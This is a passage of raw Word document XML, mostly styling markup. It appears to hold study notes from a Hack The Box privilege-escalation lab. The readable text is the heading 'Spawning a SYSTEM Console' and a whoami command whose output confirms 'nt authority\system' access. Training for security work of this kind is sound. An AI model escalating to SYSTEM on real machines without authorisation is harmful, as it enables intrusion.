          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B6B0FD" w14:textId="77777777" w:rsidR="00DF6D5F" w:rsidRPr="00DF6D5F" w:rsidRDefault="00DF6D5F" w:rsidP="00DF6D5F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Spawning a SYSTEM Console </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B0BAF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DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\htb&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F009201"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03EE2422" w14:textId="77777777" w:rsidR="00DF6D5F" w:rsidRPr="00DF6D5F" w:rsidRDefault="00DF6D5F" w:rsidP="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DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>nt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> authority\system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257F6F3D" w14:textId="77B03D94" w:rsidR="00213442" w:rsidRPr="00BB5253" w:rsidRDefault="00DF6D5F" w:rsidP="00BB5253">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:pict w14:anchorId="4E103001">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00213442" w:rsidRPr="00BB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8B"/>
    <w:rsid w:val="00213442"/>
    <w:rsid w:val="00BB5253"/>
    <w:rsid w:val="00DB0C8B"/>
    <w:rsid w:val="00DF6D5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4B0F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BAC4885F-0A0E-447D-A881-DB30165F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D5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F6D5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DF6D5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paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00DF6D5F"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading6Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00DF6D5F"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>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5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F6D5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DF6D5F"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00DF6D5F"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00DF6D5F"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>
      <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>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DF6D5F"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DF6D5F"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="windowtitle">
    <w:name w:val="window_title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DF6D5F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DF6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F6D5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F6D5F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-gray">
    <w:name w:val="text-gray"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DF6D5F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-success">
    <w:name w:val="text-success"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DF6D5F"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="font-size-14">
    <w:name w:val="font-size-14"/>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font-size-13">
    <w:name w:val="font-size-13"/>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color-white">
    <w:name w:val="color-white"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DF6D5F"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="text-center">
    <w:name w:val="text-center"/>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customStyle="1" w:styleId="card-title-desc">
    <w:name w:val="card-title-desc"/>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spawntargetbtn">
    <w:name w:val="spawntargetbtn"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DF6D5F"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="mb-0">
    <w:name w:val="mb-0"/>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customStyle="1" w:styleId="text-danger">
    <w:name w:val="text-danger"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DF6D5F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="badge">
    <w:name w:val="badge"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DF6D5F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="z-TopofForm">
    <w:name w:val="HTML Top of Form"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="z-TopofFormChar"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DF6D5F"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
      <w:vanish/>
      <w:kern w:val="0"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="z-TopofFormChar">
    <w:name w:val="z-Top of Form Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="z-TopofForm"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00DF6D5F"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
      <w:vanish/>
      <w:kern w:val="0"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="z-BottomofForm">
    <w:name w:val="HTML Bottom of Form"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="z-BottomofFormChar"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DF6D5F"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="6" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
      <w:vanish/>
      <w:kern w:val="0"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="z-BottomofFormChar">
    <w:name w:val="z-Bottom of Form Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="z-BottomofForm"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00DF6D5F"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
      <w:vanish/>
      <w:kern w:val="0"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="instancestart">
    <w:name w:val="instancestart"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00DF6D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4158">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1811941072">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1008630553">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1748458941">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="13583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628">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1175455247">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="721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8687">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1635719533">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1070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216">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="645859870">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="421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843">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="3898054">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="12691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3697">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="656350448">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1085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241">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="121390993">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1734114508">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1058362250">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="838957824">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1817989577">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="604310088">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="4090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90603">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1628928406">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="213583262">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="359890943">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="922105657">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="16630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2146">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="164245151">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1994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3215">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="984352719">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
